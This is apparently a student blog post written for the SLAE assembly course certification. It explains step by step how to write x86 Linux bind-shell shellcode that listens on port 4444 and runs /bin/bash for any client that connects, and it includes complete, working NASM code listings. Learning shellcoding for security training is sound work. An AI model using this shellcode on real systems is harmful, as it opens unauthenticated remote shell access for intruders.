Introduction
I wanted somehow to start my adventure with exploiting. First I went to corelan.be where you can find many fantastic tutorials. However they were too difficult to me to be fully understood. And then I found securitytube with its "Securitytube Linux Assembly Expert" (SLAE). Although after learning all the materials available I feel rather a beginner than an expert, the course in quite coherent way introduces assembler and shellcoding.The best motivation is to put some money in a challenge, therefore I have bought SLAE certification, and to get certified I have to complete some coding tasks. Each task requires me to put its solution on Github and to write a blog post describing my solution. The first task is to write a bind shell.
Solution
Pseudocode
The shellcode is just a simple program that creates a socket, puts it in listening state and then runs a shell that a connecting client can interact with. The 'pseudocode' is a simple overview of the program containing the logical blocks. I did not write a C program in the begining, however after all I regret that decision and further tasks will be solved with first writing a C codecreate socket;Example C code can be found e.g. on thegeekstuff.com, although my code is a bit less complicated.
prepare structure for binding;
bind socket to a port;
put socket in listening state;
accept incoming connections on socket;
redirect std(in/out/err) to socket;
execve(shell);
Creating socket
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | ; creating SOCKET xor eax,eax xor ebx,ebx xor ecx,ecx push eax ; push 0 on stack, stack now contains value 0 mov al, 102 ; ax contains call number of socket mov bl, 1 push ebx ; push 1 on stack, stack now contains 0 and 1 (SOCK_STREAM) mov cl,2 push ecx ; push 2 on stack, stack now contains 0, 1 and 2 (AF_INET) mov ecx, esp ; save the pointer to arguments in ecx ; arguments are on stack in reverse order bottom-top (0, 1, 2) ; and poping them will recover the correct order (2, 1, 0) int 0x80 ; call socket() syscall mov esi, eax ; store socket_file_descriptor in the esi register |
For this and the next syscalls you may encounter, if you want to read some details, try running manual, e.g. man socket, or if that will show some irrelevant results, try the next 'page', man 2 accept.
But how to call socket? Let's check in manual (man socket):
int socket(int domain, int type, int protocol);Domain is the protocol type used. In the same manual page you can see, that for the IPv4 it is AF_INET.
Type defines "communication semantics" what simply means that it is higher layer protocol. As we are interested in TCP, SOCK_STREAM would be our choice.
Protocol is generally not used because there is mostly theoretical possibility that there may be more than one protocol within domain. For normal use, 0 is the correct value.
The returned value is a socket file descriptor (in unix everything is a 'file').
Therefore our call is as follows:
sock_file_descriptor = socket(AF_INET, SOCK_STREAM, 0)The constants used may be found in /usr/include/i386-linux-gnu/bits/socket.h and their respective values are: 2 and 1. So our call to socket() should be: sockfd = socket(2, 1, 0);
Going back to the code, there are three xors. These instructions puts 0 in the particular registry without having the "0" value in the resulting code, what is very important, as the resulting code cannot have any NULL bytes.
Later, the 0 value is pushed onto the stack. Just after that, eax value is set to 102 (the syscall number of socket()) what will be needed further. After setting eax, ebx and ecx are set to 1 and 2 and pushed onto stack. Stack then contains
2 |
1 |
0 |
Stack pointer is saved in the ecx registry and the syscall is being executed through the int call. The call would then run syscall with number in eax with arguments in ebx and ecx. The ebx is interesting because it contains value "1" which is re-used both in pushing to stack and in calling socket - SYS_SOCKET in file /usr/include/linux/net.h is defined with value 1. Ecx contains the address to the stack and poping off the stack all the arguments will put them in correct order: 2, 1 and 0.
The result of calling int 0x80 is the socket file descriptor and is is being put in eax registry. As that registry will be used heavily, that value is saved in the esi registry.
Bind socket
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | ; opening SOCKET on port 4444 xor ecx,ecx ; ecx zeroing to ease the port number manipulating xor edx,edx ; edx zeroing to be able to push 0 onto the stack push edx ; INADDR_ANY mov cx, 4444 xchg ch,cl ; because htons(port) reverses bytes push ecx xor ax,ax mov al, 2 ; AF_INET push ax ; ax, not eax because this is part of the structure and ; is 16-bits long ; stack now has (INADDR_ANY, port_no,protocol_family) mov ecx, esp ; save the pointer to the args in ecx registry |
Bind() call requires a special structure of data as argument, read man 2 bind. The value of INADDR_ANY taken from /usr/include/netinet/in.h is 0 - we want to accept any connection from client. We are going to push it onto stack and then the port number. Therefore we push first 0. Then the 16-bit port number is being put in the cx registry. Since the structure requires the port to be the result of htons(port), in the next instruction the xchg is being called to swap bytes. After all, ecx is being pushed onto stack.
the protocol (AF_INET) family number is being pushed so the stack looks as follows:
2 |
4444 |
0 |
Having the data prepared, it is time to call the bind() syscall:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | ; calling bind() syscall ; in the file /usr/include/linux/net.h ; bind call has the value 2 ; therefore we should use that value to point the operation ; that we do with a socket mov al, 102 ; ax contains call number of socket syscall mov bl, 2 ; socket call type number, 2 = bind mov dl,16 ; size of sock_address structure push edx xor edx,edx ; zeroing again push ecx ; pointer to the structure, created 6 instructions above push esi ; push socket_file_descriptor on stack mov ecx, esp ; save the pointer to args in ecx registry int 0x80 ; call socket call type bind with particular port |
Again, all the registries need to be initiated with proper values:
eax - 102, the number of socket() syscall
ebx - 2, the number of bind() call in /usr/include/linux/net.h
edx - 16, the size of the structure generated before
Then comes the 'magic': edx, ecx and esi are pushed onto stack. The stack pointer is copied to ecx because ecx should contain pointer to arguments of bind() call. And these arguments are the file descriptor, the connection structure and the size of connection structure. The last thing is obvious - having initiated everything we are calling the syscall for bind().
Putting socket in listening state
1 2 3 4 5 6 | mov al, 102 ; ax contains call number of socket syscall mov bl, 4 ; socket call type number, 4 = listen push edx ; backlog (==0) push esi ; push socket_file_descriptor on stack mov ecx, esp ; save the pointer to args in ecx registry int 0x80 |
This part is fortunately very short :-) Again we are initiating eax with the socket() syscall number but now we are calling listen(), represented by the number 4 in `/usr/include/linux/net.h`. Listen() call requires two parameters: the socket file descriptor and something called "backlog", which can be set to 0 and forgotten. Those two values are pushed onto the stack and set in ecx as the pointer to arguments. Finally the syscall is being executed
Accepting connections
1 2 3 4 5 6 7 | mov al, 102 ; ax contains call number of socket syscall mov bl, 5 ; socket call type number, 5 = accept push edx ; addrlen push edx ; addr push esi ; push socket_file_descriptor on stack mov ecx, esp ; save the pointer to args in ecx registry int 0x80 |
We are almost done with socket manipulating. The last call is for accept(), which has number 5 in /usr/include/linux/net.h. Accept() call requires three parameters described in man 2 accept`:
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
Since second and third parameters are not used, they may be 0 and the call simplifies itself.
Redirect all the basic streams to socket
Having the socket handler open and ready, you need to remember to redirect all the I/O streams to it to allow the shell to be fully interactive. Dup2 is the syscall that does the stream duplication.1 2 3 4 5 6 7 8 9 10 11 12 13 | ; saving client connection file descriptor mov ebx, eax ; save the incoming connection's file descriptor xor ecx, ecx ; zeroing ecx before the loop mov cl, 3 ; counter for the loop stdloop: mov al, 63 ; syscall for dup2() int 0x80 dec cl ; decrementing the loop counter jns stdloop ; loop until the sign flag is not set ; it cannot be jnz because we really want ; to execute loop on 0 counter |
First we need to save the result of accept() call, we do that in ebx registry. Then we set ecx to 3 which is the loop counter as we want to run the loop three times.
In loop we first set the dup2 syscall number in eax and then we call the syscall. After all we decrement the loopcounter and test if we hadn't reached -1. If so, we do not the loop again and we go to executing the shell.
First call of dup2() will have parameters ebx,ecx and in c it would look like dup2(clientfd, 3), so now file descriptor number 3 is clientfd
Second call of dup2() would look like dup2(clientfd, 2), so clientfd now replaced stderr
Second call of dup2() would look like dup2(clientfd, 1), so clientfd now replaced stdout
Second call of dup2() would look like dup2(clientfd, 0), so clientfd now replaced stdin
So - clientfd is saved in descriptor 3 and everything will be redirected to the socket represented by clientfd.
Execute shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | ; all std's have been redirected ; finally - run SHELL mov al, 11 ; The syscall number of execve push edx ; push null - the string-terminating character push 0x68736162 ; hsab push 0x2f6e6962 ; /nib push 0x2f2f2f2f ; //// mov ebx,esp ; Store pointer to executable's name in registry push edx ; push null - the envp must be null push ebx ; push pointer to the executable path - the ; first argument of execve mov ecx,esp ; save pointer to the argv (pointer to string ; with executable + null) int 0x80 ; run ; execve("////bin/bash", argv, NULL) ; the last NULL is in edx |
The first thing in this block of code, just after initialising eax with a proper syscall number, is to put some strange fixed values onto the stack. In the code these values are commented with strings, which read backwards would result in NULL, 'bash', 'bin/' and '////. Putting all the vaules together gives us written backwards path to the executable: '////bin/bash'
Why backwards? Because we need them on the stack and this is the simplest way.
You can put any executable name here and getting that 'strange' numbers (representing ASCII values of the string characters) is possible with the following script. To ease such a task, I have created a simple python tool reverse.py.
What is important, is that the length of the executable should be a multitude of 4. Therefore, if you have a string of e.g. 9 bytes length, you must somehow extend it to 12 or 16 etc. bytes.
Taking "/bin/bash" as example, you may add additional '/' characters resulting in "////bin/bash" which is 12 bytes long string. To have the proper hex values just run `python reverse.py "////bin/bash"`
Wow - that was a bit long explanation but you now should understand where from those 'magic values' came out.
After pushing the string onto a stack, we store the pointer to the string in ebx.
Then we must store in registries the final arguments of execve call:
edx - envp - NULL, we do not want to pass anything to bash
ecx - argv - pointer to the structure containing address of the executable and NULL.
ebx - executable - pointer to the executable's name
And finally the syscall :-)
Basic usage
OK, so cool assembly, but what next?I have created some scripts to ease the process of compiling and testing the shellcode. They are described in README.md on Github, however the one 'fire and forget' is go.sh. Running it with assembly file as argument will compile and link assembler code plus create and compile a simple c program to test the shellcode (some kind of integration test). In case of this bind_shell.nasm, the syntax would be: ./go.sh bind_shell
I hope that if you managed to get here, you understand the shellcode logic and now you can create your own bind shell for Linux.
Mandatory footer to get certified:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: SLAE-769